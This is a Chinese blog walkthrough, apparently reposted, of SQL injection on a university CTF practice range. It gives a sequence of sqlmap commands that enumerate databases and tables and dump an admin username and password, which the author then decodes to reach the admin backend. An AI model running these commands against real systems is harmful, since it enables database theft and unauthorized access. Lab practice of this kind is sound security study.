SQL注入学习-RDCTF靶机实战1

其他 2020-09-13 10:24:02 阅读次数: 0

sqlmap的使用

Ps:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

本次使用的命令

sqlmap.py -u {
    
    URL} //查看是否有注入点
sqlmap.py -u {
    
    URL} -dbs //爆数据库
sqlmap.py -u {
    
    URL} -D db --tables //爆数据表
sqlmap.py -u {
    
    URL} -D db -T table --columns  //爆字段
sqlmap.py -u {
    
    URL} -D db -T table -C column(s) --dump  //输出字段

实际操作

本次使用江西软件大学网络攻防靶场做练习在这里插入图片描述
开启环境寻找注入点
在这里插入图片描述
在浏览学校文章处找到了注入点,尝试开始使用sqlmap爆破
在这里插入图片描述

找到了注入点,开始爆数据库!
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -dbs

选择rjxy数据库,开始爆表名!
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -D rjxy --tables

选择manager表爆字段
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager --columns

查询管理员密码
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager -C username,password --dump

此时得到管理员admin账户的密码,Base64解密后进行MD5解密,得到密码在这里插入图片描述

访问robots.txt查询管理员后台
在这里插入图片描述
进入管理员后台界面
在这里插入图片描述
成功进入后台界面!在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_46231152/article/details/108518831
今日推荐
技术解析 GPT-4o:即时语音交互的突破与 GenAI 发展策略
开源大模型与闭源大模型
微信小程序授权登录获取用户的openid
亿级流量系统架构设计与实战
人工智能时代的程序设计教学与课程设计
纽交所技术问题致伯克希尔 (BRK.A) 显示跌近 100%
周排行
《Python 编程-从入门到实践》11-1~11-3
关于Numpy+TensorFlow+PyTorch构造NN的总结
【原创达人】制作WINPE启动盘心得
英文图片文字识别(提取)
2022cma看片网站给一个你懂的
二叉搜索树的实现(BST)(插入+删除+查找+各种遍历+高度)
搬家通知博文地址(将博客搬到CSDN)
asfd
解决错误:MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk
如何注册微信个人小程序
每日归档
更多
2024-06-08(0)
2024-06-07(0)
2024-06-06(0)
2024-06-05(0)
2024-06-04(10)
2024-06-03(52)
2024-06-02(4)
2024-06-01(60)
2024-05-31(47)
2024-05-30(4)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022